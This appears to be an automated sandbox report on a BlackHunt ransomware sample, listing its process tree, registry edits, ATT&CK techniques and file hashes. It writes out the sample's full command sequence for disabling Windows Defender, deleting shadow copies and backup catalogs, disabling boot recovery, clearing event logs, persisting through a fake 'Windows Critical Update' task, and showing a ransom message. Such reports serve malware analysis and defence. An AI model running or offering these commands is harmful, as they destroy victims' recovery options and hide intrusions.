23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 51 PID 2544 wrote to memory of 2576 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 54 PID 2544 wrote to memory of 2576 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 54 PID 2544 wrote to memory of 2576 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 54 PID 2544 wrote to memory of 2576 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 54 PID 2544 wrote to memory of 2608 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 55 PID 2544 wrote to memory of 2608 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 55 PID 2544 wrote to memory of 2608 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 55 PID 2544 wrote to memory of 2608 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 55 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe"C:\Users\Admin\AppData\Local\Temp\23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2544 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵PID:2728
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2792
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:2796
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:1152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2860
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2736
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:4032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2972
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:3044
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2712
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2248
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:3040
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2600
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:3980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2868
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2624
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1636
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:3996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2576
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2608
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:3344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2652
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2700
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2644
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2004
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1792
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:3964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2136
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:4000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2020
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2484
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2928
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2980
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2908
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2924
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2940
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe" /F2⤵PID:2964
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe" /F3⤵
- Creates scheduled task(s)
PID:2600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1664
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2828
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:776
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:108
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:4012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2140
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2852
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2844
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:564
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:4020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1500
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
- Modifies registry class
PID:1152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1624
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:4032
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:1640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3912
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:2604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:1780
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:3276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:112
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3864
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:2692
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2804
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3444
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2732
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3376
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1800
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3284
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3440
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3528
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:1628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3356
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3592
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:2792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3576
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:2880
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:1096
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:1752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3640
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:2140
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:1032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:2712
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Modifies Internet Explorer settings
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe"2⤵
- Deletes itself
PID:3588 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:4044
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3300
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3596
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:3804
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
6Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD524820b0325745aeb98c6676397a7ca2b
SHA1d216a9f2322fa57e58c8a10707cd4fe2e9667510
SHA2560511af3b4bb43698cb91024de0f9bf1673090428d999414368145b5253631e14
SHA512e09203a59fb19e4757cd9163d1992b90839bd4b9e5754190fdd5908afeb7af730a82aa1580d5646c019679ceb4614b17e093f744b02ba107659d06efb1b8bb23
-
Filesize
12KB
MD5c8831a91af6d0412375c59882808099c
SHA10a23b996e31b08c8418c4c4d5b546291d6963ec2
SHA256b230112d00955994a628b53c2f1dd2339257d512b50d6781b6ea9d35bd74012d
SHA512044bf37e0dce29cde0333748fc33e06ce0332d315fb5bba982d4095f0b22594fc106cfb3a65e749ae765bb68ba6e8204370821827cb70b5fc9c95a2febd47342
-
Filesize
684B
MD51bfd7ae680b15c7dc76a30a120fc68fe
SHA1e1a0c73060fe603514fa107e22233b09fd08915e
SHA256f23d1ab0ed633371735539563768f019646cb9f00ca06c7a4b05d86e7aec9ff5
SHA5121d4bd448efbfe73d8c0198b234077092cfa3b1c438a57e86bdee59802183c5a5ab757218770ce384cba2870ff0073bd79493ccca2757195b3aad1b2dde578dd7